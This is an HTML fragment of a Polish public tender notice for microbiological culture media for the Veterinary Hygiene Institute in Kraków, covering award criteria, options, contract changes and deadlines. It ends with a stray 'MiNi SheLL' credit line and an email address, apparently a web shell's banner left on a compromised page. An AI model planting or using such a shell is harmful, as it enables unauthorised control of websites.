Opisie przedmiotu zamówienia, będącym załącznikiem nr 1 do Umowy, stanowią wielkości szacunkowe maksymalne i mogą być w rzeczywistości mniejsze, w zależności od potrzeb ZAMAWIAJĄCEGO, co nie może stanowić podstawy do roszczeń ze strony WYKONAWCY z tytułu niezrealizowanej części umowy. Jednakże ZAMAWIAJĄCY zobowiązuje się do realizacji co najmniej 60% wielkości zamówienia dla każdej pozycji.<br/>4.	W przypadku, o którym mowa w ust. 3, WYKONAWCA może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.<br/><br/>2.	W przypadku niewykorzystania minimalnego poziomu zamówienia Umowa ulega przedłużeniu, do czasu jego osiągnięcia, nie dłużej jednak niż o 6 miesięcy. W momencie osiągnięcia realizacji zamówienia na minimalnym poziomie w przedłużonym okresie realizacji zamówienia, umowa wygaśnie. Przedłużenie okresu realizacji zamówienia nie wymaga sporządzenia aneksu do umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1.	Kryteria oceny z podaniem wag punktowych poszczególnych kryteriów poniżej – LICZONE ODDZIELNIE DLA KAŻDEJ CZĘŚCI. <br/>Kryterium: Cena brutto wykonania zamówienia (Wc)<br/>Waga (pkt): 80<br/>Kryterium: Czas dostawy każdej partii towaru, liczony od dnia złożenia zamówienia (Wd)<br/>Waga (pkt): 20<br/>17.2.	Sposób oceny ofert:<br/>17.2.1.	w kryterium cena oferty zostaną ocenione wg wzoru:<br/>Cena = Najniższa cena oferty spośród ofert nie podlegających odrzuceniu / Cena oferty ocenianej x 80 pkt<br/>17.2.2.	w kryterium czas dostawy każdej partii towaru, liczony od dnia złożenia zamówienia, oferty zostaną ocenione następująco:<br/>•	za deklarowany czas dostawy maksymalnie do 20 dni roboczych oferta otrzyma 20 pkt,<br/>•	za deklarowany czas dostawy maksymalnie do 25 dni roboczych oferta otrzyma 10 pkt,<br/>•	za deklarowany czas dostawy maksymalnie do 30 dni roboczych oferta otrzyma 0 pkt<br/>Oferta z deklarowanym maksymalnym czasem dostawy powyżej 30 dni z zostanie odrzucona jako niezgodna z SWZ. W razie braku wskazania w formularzu ofertowym deklarowanego czasu dostawy, Zamawiający uzna, że wykonawca oferuje maksymalny dopuszczalny czas dostawy tj. do 30 dni. Maksymalna liczba punktów w tym kryterium oceny ofert wynosi 20 pkt. <br/>17.3.	Przeliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>17.4.	Jako najkorzystniejsza w danej części zamówienia zostanie uznana oferta z najwyższą łączną oceną (Wc+Wd) w wyżej wymienionych kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy każdej partii towaru, liczony od dnia złożenia zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.2.	Przedmiotem zamówienia jest dostawa podłoży mikrobiologicznych obejmująca:<br/>3.2.3.	W części 3 zamówienia dostawę podłoży do wykrywania patogenów Salmonella spp. i suplementów,<br/>3.3.	Szczegółowy Opis Przedmiotu Zamówienia zawierają załącznik nr 1 do SWZ oraz Projektowane postanowienia umowne załącznik nr 4 do SWZ. <br/>3.4.	Każdorazowo, w momencie dostawy danej partii towaru, Zamawiający zastrzega sobie możliwość sprawdzenia w obecności Wykonawcy czy towar nie jest wadliwy i w razie wątpliwości co do zgodności danej partii towaru z zapisami SWZ, Zamawiający zastrzega sobie możliwość nieprzyjęcia towaru i wezwania Wykonawcy do dostarczenia danej partii towaru w terminie pierwotnie ustalonym.<br/>3.5.	Przedmiot zamówienia musi być dopuszczony do obrotu zgodnie z obowiązującymi przepisami.<br/>3.6.	Dostawy dostarczane będą partiami na koszt Wykonawcy do Zakładu Higieny Weterynaryjnej w Krakowie, ul. Brodowicza 13b. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33694000-1 - Czynniki diagnostyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 3.	Ilości podłoży mikrobiologicznych i suplementów podane w Opisie przedmiotu zamówienia, będącym załącznikiem nr 1 do Umowy, stanowią wielkości szacunkowe maksymalne i mogą być w rzeczywistości mniejsze, w zależności od potrzeb ZAMAWIAJĄCEGO, co nie może stanowić podstawy do roszczeń ze strony WYKONAWCY z tytułu niezrealizowanej części umowy. Jednakże ZAMAWIAJĄCY zobowiązuje się do realizacji co najmniej 60% wielkości zamówienia dla każdej pozycji.<br/>4.	W przypadku, o którym mowa w ust. 3, WYKONAWCA może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.<br/><br/>2.	W przypadku niewykorzystania minimalnego poziomu zamówienia Umowa ulega przedłużeniu, do czasu jego osiągnięcia, nie dłużej jednak niż o 6 miesięcy. W momencie osiągnięcia realizacji zamówienia na minimalnym poziomie w przedłużonym okresie realizacji zamówienia, umowa wygaśnie. Przedłużenie okresu realizacji zamówienia nie wymaga sporządzenia aneksu do umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1.	Kryteria oceny z podaniem wag punktowych poszczególnych kryteriów poniżej – LICZONE ODDZIELNIE DLA KAŻDEJ CZĘŚCI. <br/>Kryterium: Cena brutto wykonania zamówienia (Wc)<br/>Waga (pkt): 80<br/>Kryterium: Czas dostawy każdej partii towaru, liczony od dnia złożenia zamówienia (Wd)<br/>Waga (pkt): 20<br/>17.2.	Sposób oceny ofert:<br/>17.2.1.	w kryterium cena oferty zostaną ocenione wg wzoru:<br/>Cena = Najniższa cena oferty spośród ofert nie podlegających odrzuceniu / Cena oferty ocenianej x 80 pkt<br/>17.2.2.	w kryterium czas dostawy każdej partii towaru, liczony od dnia złożenia zamówienia, oferty zostaną ocenione następująco:<br/>•	za deklarowany czas dostawy maksymalnie do 20 dni roboczych oferta otrzyma 20 pkt,<br/>•	za deklarowany czas dostawy maksymalnie do 25 dni roboczych oferta otrzyma 10 pkt,<br/>•	za deklarowany czas dostawy maksymalnie do 30 dni roboczych oferta otrzyma 0 pkt<br/>Oferta z deklarowanym maksymalnym czasem dostawy powyżej 30 dni z zostanie odrzucona jako niezgodna z SWZ. W razie braku wskazania w formularzu ofertowym deklarowanego czasu dostawy, Zamawiający uzna, że wykonawca oferuje maksymalny dopuszczalny czas dostawy tj. do 30 dni. Maksymalna liczba punktów w tym kryterium oceny ofert wynosi 20 pkt. <br/>17.3.	Przeliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>17.4.	Jako najkorzystniejsza w danej części zamówienia zostanie uznana oferta z najwyższą łączną oceną (Wc+Wd) w wyżej wymienionych kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy każdej partii towaru, liczony od dnia złożenia zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.2.	Przedmiotem zamówienia jest dostawa podłoży mikrobiologicznych obejmująca:<br/>3.2.4.	W części 4 zamówienia dostawę podłoży gotowych.<br/>3.3.	Szczegółowy Opis Przedmiotu Zamówienia zawierają załącznik nr 1 do SWZ oraz Projektowane postanowienia umowne załącznik nr 4 do SWZ. <br/>3.4.	Każdorazowo, w momencie dostawy danej partii towaru, Zamawiający zastrzega sobie możliwość sprawdzenia w obecności Wykonawcy czy towar nie jest wadliwy i w razie wątpliwości co do zgodności danej partii towaru z zapisami SWZ, Zamawiający zastrzega sobie możliwość nieprzyjęcia towaru i wezwania Wykonawcy do dostarczenia danej partii towaru w terminie pierwotnie ustalonym.<br/>3.5.	Przedmiot zamówienia musi być dopuszczony do obrotu zgodnie z obowiązującymi przepisami.<br/>3.6.	Dostawy dostarczane będą partiami na koszt Wykonawcy do Zakładu Higieny Weterynaryjnej w Krakowie, ul. Brodowicza 13b. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33694000-1 - Czynniki diagnostyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 3.	Ilości podłoży mikrobiologicznych i suplementów podane w Opisie przedmiotu zamówienia, będącym załącznikiem nr 1 do Umowy, stanowią wielkości szacunkowe maksymalne i mogą być w rzeczywistości mniejsze, w zależności od potrzeb ZAMAWIAJĄCEGO, co nie może stanowić podstawy do roszczeń ze strony WYKONAWCY z tytułu niezrealizowanej części umowy. Jednakże ZAMAWIAJĄCY zobowiązuje się do realizacji co najmniej 60% wielkości zamówienia dla każdej pozycji.<br/>4.	W przypadku, o którym mowa w ust. 3, WYKONAWCA może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.<br/><br/>2.	W przypadku niewykorzystania minimalnego poziomu zamówienia Umowa ulega przedłużeniu, do czasu jego osiągnięcia, nie dłużej jednak niż o 6 miesięcy. W momencie osiągnięcia realizacji zamówienia na minimalnym poziomie w przedłużonym okresie realizacji zamówienia, umowa wygaśnie. Przedłużenie okresu realizacji zamówienia nie wymaga sporządzenia aneksu do umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1.	Kryteria oceny z podaniem wag punktowych poszczególnych kryteriów poniżej – LICZONE ODDZIELNIE DLA KAŻDEJ CZĘŚCI. <br/>Kryterium: Cena brutto wykonania zamówienia (Wc)<br/>Waga (pkt): 80<br/>Kryterium: Czas dostawy każdej partii towaru, liczony od dnia złożenia zamówienia (Wd)<br/>Waga (pkt): 20<br/>17.2.	Sposób oceny ofert:<br/>17.2.1.	w kryterium cena oferty zostaną ocenione wg wzoru:<br/>Cena = Najniższa cena oferty spośród ofert nie podlegających odrzuceniu / Cena oferty ocenianej x 80 pkt<br/>17.2.2.	w kryterium czas dostawy każdej partii towaru, liczony od dnia złożenia zamówienia, oferty zostaną ocenione następująco:<br/>•	za deklarowany czas dostawy maksymalnie do 20 dni roboczych oferta otrzyma 20 pkt,<br/>•	za deklarowany czas dostawy maksymalnie do 25 dni roboczych oferta otrzyma 10 pkt,<br/>•	za deklarowany czas dostawy maksymalnie do 30 dni roboczych oferta otrzyma 0 pkt<br/>Oferta z deklarowanym maksymalnym czasem dostawy powyżej 30 dni z zostanie odrzucona jako niezgodna z SWZ. W razie braku wskazania w formularzu ofertowym deklarowanego czasu dostawy, Zamawiający uzna, że wykonawca oferuje maksymalny dopuszczalny czas dostawy tj. do 30 dni. Maksymalna liczba punktów w tym kryterium oceny ofert wynosi 20 pkt. <br/>17.3.	Przeliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>17.4.	Jako najkorzystniejsza w danej części zamówienia zostanie uznana oferta z najwyższą łączną oceną (Wc+Wd) w wyżej wymienionych kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy każdej partii towaru, liczony od dnia złożenia zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">8.2.	Zamawiający nie będzie żądał podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia wykonawców z postępowania a ocena podmiotowa wykonawców oparta będzie o oświadczenie, o którym mowa w art. 125 ust. 1 PZP.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W postępowaniu o udzielenie zamówienia Zamawiający nie żąda przedmiotowych środków dowodowych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6.5.	W przypadku wspólnego ubiegania się o udzielenie zamówienia żaden z Wykonawców nie może podlegać wykluczeniu z postępowania. <br/><br/>8.4.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia:<br/>8.4.1.	Wykonawcy tacy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>8.4.2.	Do Wykonawców takich stosuje się odpowiednio przepisy dotyczące Wykonawcy.<br/><br/>13.6.	W przypadku wykonawców wspólnie ubiegających się o zamówienie ofertę podpisują osoby upoważnione do reprezentowania wykonawców (każdy z osobna) wspólnie ubiegających się o udzielenie zamówienia zgodnie z formą reprezentacji, określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub określają pełnomocnika do reprezentacji i wówczas wraz z oferta przesyłają pełnomocnictwo. <br/><br/>22.10.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań dotyczących prac związanych z rozmieszczeniem i instalacją, w ramach zamówienia na dostawy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony przewidują możliwość istotnej zmiany postanowień umowy, w przypadku:<br/>1)	zmiany terminu realizacji zamówienia poprzez jego przedłużenie ze względu na niezawinione przez Stronę przyczyny spowodowane przez tzw. siłę wyższą w rozumieniu §8 Umowy – o czasu równy okresowi, w którym nie była możliwa realizacja umowy; <br/>2)	gdy w okresie obowiązywania umowy, dany produkt objęty przedmiotem zamówienia przestał być produkowany i jest niedostępny, co zostanie potwierdzone stosownym pismem od producenta, WYKONAWCA zobowiązuje się do zaoferowania innego produktu, spełniającego wymagania określone przez ZAMAWIAJĄEGO w SWZ, bez zmiany ceny. <br/>2.	Strony przewidują możliwości wprowadzenia odpowiedniej zmiany wysokości wynagrodzenia należnego WYKONAWCY w przypadku zmiany:<br/>1)	stawki podatku od towaru i usług oraz podatku akcyzowego;<br/>2)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę;<br/>3)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;<br/>4)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z 4 października 2018 r. o pracowniczych planach kapitałowych,<br/>5)	poziomu cen materiałów lub kosztów WYKONAWCY niniejszej umowy związanych z realizacją zamówienia będącego przedmiotem niniejszej umowy (z wyłączeniem określonych w pkt 1-4 oraz zmian wynagrodzeń wypłacanym członkom zarządu)<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania Przedmiotu umowy przez WYKONAWCĘ i zostanie to udowodnione, a Strony dochowają ciążących obowiązków, o których mowa w ustępach poniżej.<br/><br/>Szczegółowe warunki wprowadzenia zmian umowy opisane są w § 9 wzoru umowy, stanowiacego załącznik nr 4 do SWZ i nie zostały tutaj przytoczone ze względu na ograniczenie ilości znaków w formularzu ogłoszenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c8a9741db114-4520-a40c-ec9647cc05c5</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 4.1.	Termin wykonania zamówienia: sukcesywnie partiami przez 12 miesięcy od dnia zawarcia umowy z Wykonawcą, nie dłużej jednak niż do dnia, w którym zostanie wykorzystany maksymalny poziom zamówienia.<br/>4.2.	Termin dostawy danej partii towaru: maksymalnie 30 dni roboczych od dnia złożenia zamówienia. Skrócenie terminu dostawy stanowi dodatkowe kryterium oceny ofert. <br/>4.3.	W przypadku niewykorzystania minimalnego poziomu zamówienia określonego w OPZ umowa ulega przedłużeniu, do czasu jego osiągnięcia, nie dłużej jednak niż o 6 miesięcy. W momencie osiągnięcia realizacji zamówienia na minimalnym poziomie w przedłużonym okresie realizacji zamówienia, umowa wygaśnie. Przedłużenie okresu realizacji zamówienia nie wymaga sporządzenia aneksu do umowy.<br/><br/>6.1.	Z postępowania wyklucza się Wykonawcę, wobec którego zachodzą przesłanki wykluczenia z postępowania określone w art. 108 ust. 1 PZP oraz w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2025 r., poz. 514 z pózn. zm.).

Creat By MiNi SheLL
Email: jattceo@gmail.com